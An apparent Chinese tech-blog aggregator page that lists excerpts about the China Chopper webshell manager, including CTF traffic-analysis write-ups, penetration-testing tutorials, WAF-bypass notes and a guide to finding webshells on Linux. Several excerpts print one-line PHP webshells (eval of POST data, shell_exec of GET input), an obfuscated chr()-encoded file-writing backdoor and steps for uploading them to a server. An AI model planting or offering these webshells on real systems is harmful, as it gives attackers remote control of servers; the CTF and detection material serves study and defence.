首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
buuctf 中国菜刀
2024-10-19
buuctf-misc 菜刀666
解压出一个666666.pcapng的文件,我们拖进wireshark 因为是菜刀吗?一般都是post连接,于是我们过滤post数据 http.request.method==POST 然后分析流量,当我们分析到流7时,发现了base64编码,解码一看是上传的图片的地址 z1的值拿去解码得到 后面跟了个z2是以十六进制就行存储 将z2的值放在hxd中,然后保存为flag.jpg 然后我们就发现出来一张照片 图片中说是密码,难道还有让我们解密的东西?然后我们继续流量分析,再分析到流9时,发现一个f
最新中国菜刀caidao-20160620下载和说明
0x00 中国制造, 黑客之刀 中国菜刀是中国安全圈内使用非常广泛的一款Webshell管理工具,此次老兵大牛进行了更新,界面更加优美,功能更加丰富,有图有真相! 0x01 验证 此次更新还自带了官网验证功能,妈妈再也不会担心我的webshell了. 0x02 软件说明 菜刀 / Caidao @ http://www.maicaidao.com/ 1 菜刀,他是一款专业的网站管理工具 一.网站管理模块 (1)放在网站上的脚本程序分两种 1.1)“一句话(Eval)”: PHP, ASP, AS
小白日记51:kali渗透测试之Web渗透-WebShell(中国菜刀、WeBaCoo、Weevely)
webshell 本质:<?php echo shell_exec($_GET['cmd']);?> windows平台 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强 [但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/] 1.利用上传漏洞,先上传一句话木马[支持三种服务器端PHP.ASP.ASP.NET] 使用ssh连接metasploitable 创建包含木马代码的文件 2.连接相应的服务器端 添加服务器端URL [密码为一
关于中国菜刀,如何"切菜"
介绍 经典标题党,中国菜刀有大牛已经分析过了->传送门(http://blog.csdn.net/p656456564545/article/details/49671829).博主PHP刚接触,所以有了下文... 0x00 菜 关于一句话木马肯定是眼熟能详,一句话木马如下: <?PHP eval($_GET[w]);?> 0x01 刀 一把西瓜刀如下: # -*-coding=utf-8-*- #!/usr/bin/env python import sys import requ
CTF-练习平台-Misc之 中国菜刀,不再web里?
八.中国菜刀,不再web里? 下载文件后解压,是一个数据包,用wireshark打开,题中说的是菜刀,那就找http协议,首先过滤出http协议包 在第四个里面找到一句话木马 Flag应该在木马之后拿到的,所以找下一个http包,追踪一下流 发现base64编码,解码一下,最后两个%3D是两个=,改过来 从代码里可以看到传输文件是flag.tar.gz,前后还有字符“X@Y”,在下一个包里,找到对应数据,对其显示数据分组字节 把前后的X@Y删去,解码为压缩格式 得到flag
【Web Shell】- 技术剖析中国菜刀 - Part II
在第一部分,简单描述了中国菜刀的基本功能.本文我将剖析中国菜刀的平台多功能性.传输机制.交互模式和检测.我希望通过我的讲解,您能够根据您的环境检测出并清除它. 平台 那么中国菜刀可以在哪些平台上运行?答案是任何能够运行JSP.ASP.ASPX.PHP.CFM的Web服务器.这些是大多数Web应用程序语言.那么操作系统呢?中国菜刀足够灵活,可以在Windows和Linux上运行.这种操作系统和应用程序的灵活性使其成为一个更危险的Web shell. 在本系列的第一部分中,我们展示了使用ASPX在W
【Web Shell】- 技术剖析中国菜刀 – Part I
这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款Webshell管理工具,想买菜刀请出门左拐东门菜市场王铁匠处.中国菜刀用途十分广泛,支持多种语言,小巧实用,据说是一位中国军人退伍之后的作品.日前,国外安全公司Fireeye对这款工具进行了详细的剖析,可以说是一部非常nice的菜刀使用教程. 分析 中国菜刀的客户端可在www.maicaidao.com下载到. Web shell (CnC) Client MD5 caidao.exe 5001ef50c7e869253a7
一句话木马和中国菜刀的结合拿webshell
什么叫做一句话木马: 就是一句简单的脚本语言,一句话木马分为Php,asp,aspx等 中国菜刀: 连接一句话木马的工具 实验的目的: 通过一句话木马来控制我们的服务器,拿到webshell. 实验环境说明: 上传一句话木马到网站的根目录下: 然后通过中国菜刀连接: 获取wensell ,文件目录等等:
php一句话木马+中国菜刀拿服务器文件目录
使用工具: 中国菜刀 一句话php木马 <?php @eval($_POST['123456']);?> 第一步,将php木马上传至服务器,为了方便我就直接在服务器上建立. [root@proxy html]# vim .php <?php @eval($_POST[']);?> 第二步,打开中国菜刀配置,密码为123456 点击确定之后,无其他问题,即可成功. 右键点击该链接,选择文件管理,即可查看到服务器的文件目录 接下来..不用说了
Bugku-CTF分析篇-中国菜刀(国产神器)
中国菜刀 国产神器
利用Fiddler2和Proxifier分析你用的中国菜刀是否带有后门
为了避免自己辛辛苦苦拿下的站点被一些拿来主义者不费吹灰之力就据为己有,下面来教大家如何检测菜刀有没有留后门. 对于有没有后门这个问题,大牛们会说抓包看一下就行了,那如何抓包呢?有很多软件可以,这里使用的是Fiddler2(免费,E文,下载地址请问谷歌).另外由于菜刀本身不支持代理,所以我们需要一款软件中转一下,这里用的是Proxifier. 以上两款软件的下载.安装.配置过程略. 首先,设置Proxifier,配置文件 - 代理服务器,添加你的本地代理,Fiddler2默认是127.0.0.1:
渗透-简单制作过waf的中国菜刀
0x01 简单分析 web渗透中很常见的情况,用菜刀连接免杀的一句话木马连不上,有waf 除了变形一句话木马为免杀一句话,我们还需要来制作过waf的菜刀进行连接. 这里用的一句话为 来看看菜刀连接一句话的时候的包 x=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F
Bugku 分析 中国菜刀
解压之后得到了一个流量包,只有不到10KB,美滋滋 先抓重点,过滤出http,只有6条数据记录,3条post,3条response,3条post都是一样的 随便打开一条pos 是一个assert断言,断言内容是一串base64加密的字符串(最后的%3D先解码为=) 得到了一串php代码 @ini_set("display_errors","0"); @set_time_limit(0); if(PHP_VERSION<\'5.3.0\') { @set_mag
kali中的中国菜刀weevely
weevely是一个kali中集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevely是交互性工具,只可以在命令终端执行. weevely generate password/tmp/1.php #生成一个名为1.php的后门,密码为password 这是生成后的php后门,是base64加密过后的. 将此后门上传到网站,用weevely连接,连接后面直接跟上设置的密码 weeve
ASPX版菜刀一句话,留后门专用
首先解释一下为什么要做这个玩意:众所周知.net一句话是不能插入到文件之中的,除非那个页面使用Jscript编写,但是现在看来 Jscript市场很低,遇到的.net站基本都是C#.新建一个SHELL太过于明显,而且其中的eval更是在WEBSHELL扫描工具的淫威下直接 出局.如果不能提权的话,那么过一段时间再打开往往面临的是大大的404.综上,利用.net会加载bin目录中的类库的特点和命名空间这个神奇 的东西编写了这个程序,将文件放在bin目录并在文件中插入调用代码即可.可能你会说放在bi
菜刀连接webshell
中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了.我记得以前接触的时候摸索了好久才会用,哈哈..后来领悟之后才发现并不难操作,同时功能也比我想象的要强大. 1.中国菜刀支持的服务端脚本:PHP.ASP: 2.主要功能有:文件管理(有足够的权限时候可以管理整个磁盘/文件系统),数据库管理,虚拟终端. 3.菜刀的工作原理是:利用上传到服务器的一句话脚本再通过一些
Github 安全类Repo收集整理
作者:天谕链接:https://zhuanlan.zhihu.com/p/21380662来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处.刚好这两天对之前github上关注的一些比较有意思的项目进行了一下分类整理,在这里列出来分享给大家,希望能对大家寻找工具或者资源有所帮助. 大部分Repo是关于安全以及Python的,也有一些其他主题的项目,有很多我都没有用过,关于项目的功能概括如果写的有不对的地方,还请大家多多包涵,给予指正. 欢迎组团欢迎一起学习交流!转载请注
WEB安全--渗透笔记
前言 服务器被攻击是常有的事,自从上一次被注入挂马后最先想到的是安全狗,最新版的安全狗软件可以抵挡大部分的恶意攻击,但是却有很多网站管理员疏于管理,才有了接下来的入侵. 我们的攻击目标近期上线了安全狗服云平台,官方宣传是服务器安全管理云平台,能够对服务器进行批量安全管理,功能包括了服务器安全健康监控.服务器安全保护.7*24小时资源和系统监控.云端批量服务器管理,同时还有强大的告警功能.是否安装了安全狗就真的是这么安全吗?让我先来测试下吧. 目录 ⊙一.找到注入点 ⊙二.绕过SQL注入过滤 ⊙三
Metasploit 笔记
目录一.名词解释···································································· 3二.msf基础··································································· 3三.信息探测与收集··························································· 4四.基本漏洞扫描··················
linux查找webshell
原文出处:http://my.oschina.net/longquan/blog/155905 首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接 隐藏很深的小马 fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).ch
myplan
告警集成平台 – OneAlert(空) JumpServer-开源跳板机(堡垒机)搭建(空) Suricata入侵检测.防御系统搭建(空) Snort入侵检测系统搭建(空) OpenVas开放式漏洞评估系统(空) 如何通过IP地址进行精准定位(空) 使用AntiSamy防范XSS跨站脚本攻击 Sysinternals Suite微软工具程序集 详解Windows Hash与破解 http://www.2cto.com/article/201506/409324.html 恶意代码检测 虚拟机脱
热门专题
java 读取证书访问https 接口
1$XSxmDEb$##Y2kVALbX1_AO##/
contos7 mysql 定时备份
非阻塞套接字,read返回0 errno 为啥没值
mobaxterm中文乱码
softether tap 错误
win10 计划任务跑syctoy
vs2017 正则表达式 多行匹配
tornado在 on_finish
centos nat无法连接外网
cmake 无法识别 vs2017
用python使excel选择性爬取数据
必须要用户触摸屏幕后才能自动播放
nginx开启网页ftp目录
python socket setsockopt 端口重用
git 删除记录在帐号
bat监控windows进程并自动重启
intellijidea创建简单的web项目
sqlserver2008r2服务器名称如何设置为ip
蚂蚁云数据库属于odps数据库